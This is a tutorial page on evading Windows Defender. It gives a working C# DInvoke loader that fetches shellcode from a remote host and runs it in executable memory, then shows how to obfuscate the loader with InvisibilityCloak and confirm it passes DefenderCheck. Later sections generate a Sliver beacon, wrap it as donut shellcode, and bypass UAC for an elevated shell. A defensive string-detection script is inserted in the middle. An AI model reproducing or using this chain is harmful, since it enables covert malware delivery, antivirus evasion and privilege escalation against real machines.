# Bypass AV/EDR via DInvoke + Sliver

## Windows Defender 2025

### Creating Loader

**Repository:** <https://github.com/Kara-4search/DInvoke_shellcodeload_CSharp>

```csharp
using System;
using System.Collections.Generic;
using System.Linq;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading.Tasks;
using System.Diagnostics;
using System.Net;

namespace DInvoke_Code
{
    class Program
    {
        static void Main(string[] args)
        {

            //Dinvoke test
            byte[] codepent = new WebClient().DownloadData("http://192.168.1.109:8080/rev.bin");

            // Console.WriteLine((uint)codepent.Length);
            // System.Threading.Thread.Sleep(10000);
            IntPtr func_ptr = IntPtr.Zero;
            // IntPtr pHandle = Process.GetCurrentProcess().Handle;
            
            func_ptr = DInvokeFunctions.GetLibraryAddress("kernel32.dll", "VirtualAlloc");
            DELEGATES.VirtualAllocRx VirtualAllocRx = Marshal.GetDelegateForFunctionPointer(func_ptr, typeof(DELEGATES.VirtualAllocRx)) as DELEGATES.VirtualAllocRx;
            IntPtr rMemAddress = VirtualAllocRx(0, (uint)codepent.Length, 0x1000 | 0x2000, 0x40);

            Marshal.Copy(codepent, 0, (IntPtr)(rMemAddress), codepent.Length);
            IntPtr hThread = IntPtr.Zero;
            IntPtr pinfo = IntPtr.Zero;
            UInt32 threadId = 0;

            func_ptr = DInvokeFunctions.GetLibraryAddress("kernel32.dll", "CreateThread");
            DELEGATES.CreateThreadRx CreateThreadRx = Marshal.GetDelegateForFunctionPointer(func_ptr, typeof(DELEGATES.CreateThreadRx)) as DELEGATES.CreateThreadRx;
            hThread = CreateThreadRx(0, 0, rMemAddress, pinfo, 0, ref threadId);

            func_ptr = DInvokeFunctions.GetLibraryAddress("kernel32.dll", "WaitForSingleObject");
            DELEGATES.WaitForSingleObjectRx WaitForSingleObjectRx = Marshal.GetDelegateForFunctionPointer(func_ptr, typeof(DELEGATES.WaitForSingleObjectRx)) as DELEGATES.WaitForSingleObjectRx;
            WaitForSingleObjectRx(hThread, 0xFFFFFFFF);
        }
    }
}
```

### Obfuscating the project

**Obfuscation project:**

{% embed url="https://github.com/h4wkst3r/InvisibilityCloak" %}

**Modify lines 147 and 148 of `InvisibilityCloak.py` as follows (the script otherwise fails on non-ASCII source files):**

```python
openAssemblyInfoFile = open(assemblyInfoFile, 'r', encoding='utf-8')
openCopyAssemblyInfoFile = open(f"{assemblyInfoFile}_copy", "w", encoding='utf-8')
```

```powershell
PS C:\Users\maldev\Desktop\CompiledTools\InvisibilityCloak > python.exe .\InvisibilityCloak.py -d ..\DInvoke_shellcodeload_CSharp\DInvoke_shellcodeload -n "Zero" -m reverse

        ,                 .     .   .        ,-. .         ,
        |         o     o |   o | o |       /    |         |
        | ;-. . , . ,-. . |-. . | . |-  . . |    | ,-. ,-: | ,
        | | | |/  | `-. | | | | | | |   | | \    | | | | | |<
        ' ' ' '   ' `-' ' `-' ' ' ' `-' `-|  `-' ' `-' `-` ' `
                                        `-'

====================================================
[*] INFO: String obfuscation method: reverse
[*] INFO: Directory of C# project: ..\DInvoke_shellcodeload_CSharp\DInvoke_shellcodeload
[*] INFO: New tool name: Zero
====================================================

[*] INFO: Generating new GUID for C# project
[*] INFO: New project GUID is f9d3c7e4-82de-4a66-9eba-8b0b3c149768
[*] INFO: Changing C# project GUID in below files:
..\DInvoke_shellcodeload_CSharp\DInvoke_shellcodeload\DInvoke_shellcodeload.sln
..\DInvoke_shellcodeload_CSharp\DInvoke_shellcodeload\DInvoke_test\DInvoke_shellcodeload.csproj
..\DInvoke_shellcodeload_CSharp\DInvoke_shellcodeload\DInvoke_test\Properties\AssemblyInfo.cs


[*] INFO: Removing PDB string in C# project file

[*] INFO: Renaming DInvoke_shellcodeload.sln to Zero.sln
[*] INFO: Renaming DInvoke_shellcodeload.csproj to Zero.csproj
[*] INFO: Renaming directory DInvoke_shellcodeload to Zero

[+] SUCCESS: New GUID of f9d3c7e4-82de-4a66-9eba-8b0b3c149768 was generated and replaced in your project
[+] SUCCESS: New tool name of Zero was replaced in project

[*] INFO: Performing reverse obfuscation on strings in ..\DInvoke_shellcodeload_CSharp\DInvoke_shellcodeload\DInvokeFunctions.cs
[*] INFO: Performing reverse obfuscation on strings in ..\DInvoke_shellcodeload_CSharp\DInvoke_shellcodeload\DInvoke_test\DELEGATES.cs
[*] INFO: Performing reverse obfuscation on strings in ..\DInvoke_shellcodeload_CSharp\DInvoke_shellcodeload\DInvoke_test\DInvokeFunctions.cs
[*] INFO: Performing reverse obfuscation on strings in ..\DInvoke_shellcodeload_CSharp\DInvoke_shellcodeload\DInvoke_test\Program.cs
[*] INFO: Performing reverse obfuscation on strings in ..\DInvoke_shellcodeload_CSharp\DInvoke_shellcodeload\DInvoke_test\obj\x64\Debug\.NETFramework,Version=v4.7.2.AssemblyAttributes.cs
[*] INFO: Performing reverse obfuscation on strings in ..\DInvoke_shellcodeload_CSharp\DInvoke_shellcodeload\DInvoke_test\obj\x86\Debug\.NETFramework,Version=v4.7.2.AssemblyAttributes.cs

[+] SUCCESS: Your new tool Zero now has the invisibility cloak applied.

FLARE-VM 04/30/2025 16:31:00
PS C:\Users\maldev\Desktop\CompiledTools\InvisibilityCloak >
```

<figure><img src="/files/yPu4RO4XsMsBH4cU3b1k" alt=""><figcaption><p>Obfuscated Code with Reverse Mode</p></figcaption></figure>

In Visual Studio, change the project property **Output Type** to **Windows Application** so that no console window is shown when the loader runs.

<figure><img src="/files/SaONaNwHErV9GXE0GS5A" alt=""><figcaption></figcaption></figure>

Finally, replace every remaining instance of the string `DInvoke` in the project, then compile it in Release configuration for the x64 architecture and check the result with DefenderCheck:

```powershell
PS C:\Users\maldev\Desktop\CompiledTools\DefenderCheck\DefenderCheck\DefenderCheck\bin\Release > .\DefenderCheck.exe C:\Users\maldev\Desktop\CompiledTools\DInvoke_shellcodeload_CSharp\DInvoke_shellcodeload\DInvoke_test\bin\x64\Release\DInvoke_test.exe
[+] No threat found in submitted file!
```
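The DefenderCheck result above only says that no static signature fired. As an added example (not from the page, InvisibilityCloak or DefenderCheck), the following script shows why reverse-string obfuscation is a thin layer from a defender's point of view: it extracts ASCII and UTF-16LE strings from a binary, reverses a watchlist of the API names the loader uses, and reports every match. The watchlist, the sample bytes and the `#US` heap layout are constructed approximations, not taken from a real compiled assembly.

```python
from __future__ import annotations
import re

# Names the loader above resolves at runtime via DInvoke (taken from the page's code).
WATCHLIST = {"kernel32.dll", "VirtualAlloc", "CreateThread", "WaitForSingleObject"}

_ASCII = re.compile(rb"[\x20-\x7e]{6,}")
# .NET string literals live in the #US heap as UTF-16LE, so an ASCII-only
# "strings" pass would miss every literal InvisibilityCloak rewrote.
_UTF16 = re.compile(rb"(?:[\x20-\x7e]\x00){6,}")


def extract_strings(blob: bytes) -> list[str]:
    """Printable ASCII and UTF-16LE runs of at least six characters."""
    found = [m.group().decode("ascii") for m in _ASCII.finditer(blob)]
    found += [m.group().decode("utf-16-le") for m in _UTF16.finditer(blob)]
    return found


def find_reversed_indicators(blob: bytes) -> dict[str, str]:
    """Map each watchlist name whose reversed form appears in blob to the carrier string."""
    reversed_forms = {name[::-1].lower(): name for name in WATCHLIST}
    hits: dict[str, str] = {}
    for s in extract_strings(blob):
        lowered = s.lower()
        for rev, name in reversed_forms.items():
            if rev in lowered:
                hits[name] = s
    return hits


def _us_heap_entry(s: str) -> bytes:
    """Constructed approximation of one #US heap entry: length byte, UTF-16LE text, flag byte."""
    data = s.encode("utf-16-le")
    return bytes([len(data) + 1]) + data + b"\x00"


# Constructed sample standing in for a compiled, reverse-obfuscated assembly.
SAMPLE = (
    b"MZ\x90\x00" + b"\x00" * 12
    + _us_heap_entry("lld.23lenrek")          # "kernel32.dll" reversed
    + _us_heap_entry("collAlautriV")          # "VirtualAlloc" reversed
    + _us_heap_entry("Hello from Zero")       # benign literal, must not match
    + _us_heap_entry("daerhTetaerC")          # "CreateThread" reversed
    + b"tcejbOelgniSroFtiaW\x00"              # ASCII "WaitForSingleObject" reversed
)

if __name__ == "__main__":
    for name, carrier in sorted(find_reversed_indicators(SAMPLE).items()):
        print(f"{carrier!r} -> {name}")
```

The same reversed strings, declared as wide and ASCII patterns, are what a YARA rule for this obfuscation mode would carry.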

### Create a beacon with Sliver

```sh
sliver > generate beacon --http 192.168.1.109:1234 --os windows

[*] Generating new windows/amd64 beacon implant binary (1m0s)
[*] Symbol obfuscation is enabled
[*] Build completed in 43s
[*] Implant saved to /home/Intrusionz3r0/Documents/Sliver/KOREAN_JUNKER.exe

sliver > http --lhost 192.168.1.109 --lport 1234 

[*] Starting HTTP :1234 listener ...
[*] Successfully started job #2

sliver >  
```

### Install Donut

```sh
#Download and compile donut
Intrusionz3r0@htb[/htb]$ git clone https://github.com/TheWover/donut
Intrusionz3r0@htb[/htb]$ cd donut/
Intrusionz3r0@htb[/htb]$ make -f Makefile
Intrusionz3r0@htb[/htb]$ ./donut ./
```

{% hint style="info" %}
When running donut, pass `-e 3` for encryption and `-b 1` to leave out the AMSI bypass, because donut's built-in AMSI bypass gets detected.
{% endhint %}

```sh
❯ ./donut -i KOREAN_JUNKER.exe -b 1 -e 3 -o rev.bin

  [ Donut shellcode generator v1 (built Apr 30 2025 19:45:41)
  [ Copyright (c) 2019-2021 TheWover, Odzhan

  [ Instance type : Embedded
  [ Module file   : "KOREAN_JUNKER.exe"
  [ Entropy       : Random names + Encryption
  [ File type     : EXE
  [ Target CPU    : x86+amd64
  [ AMSI/WDLP/ETW : none
  [ PE Headers    : overwrite
  [ Shellcode     : "rev.bin"
  [ Exit          : Thread
```

The payload is downloaded and executed successfully:

<figure><img src="/files/Oj7igLYuMacb5RVbejcq" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/jxJXDf8U3CzzIPRGA8SF" alt=""><figcaption></figcaption></figure>

#### Install the UAC-BOF-Bonanza toolkit into Sliver

```sh
❯ git clone https://github.com/icyguider/UAC-BOF-Bonanza.git
❯ cd UAC-BOF-Bonanza
❯ cp -rp ~/Documents/Tools/UAC-BOF-Bonanza/CmstpElevatedCOM/ ~/.sliver-client/extensions
❯ cd ~/.sliver-client/extensions/CmstpElevatedCOM
❯ make
sliver (KOREAN_JUNKER) > extensions load /home/Intrusionz3r0/.sliver-client/extensions/CmstpElevatedCOM
sliver (KOREAN_JUNKER) > armory install coff-loader
```

#### Elevate to a high-integrity shell

```sh
sliver (KOREAN_JUNKER) > CmstpElevatedCOM "C:\Users\maldev\Downloads\http-local-1234.exe"
[*] Successfully executed CmstpElevatedCOM (coff-loader)
[*] Got output:
Successfully spoofed PEB for explorer.exe
Successfully created elevated CMLuaUtil COM object
Calling ShellExec method from the elevated CMLuaUtil COM object...
ShellExec executed successfully!
```

<figure><img src="/files/m0hr4skSapQovN6XbdEz" alt=""><figcaption><p>High Integrity Shell</p></figcaption></figure>
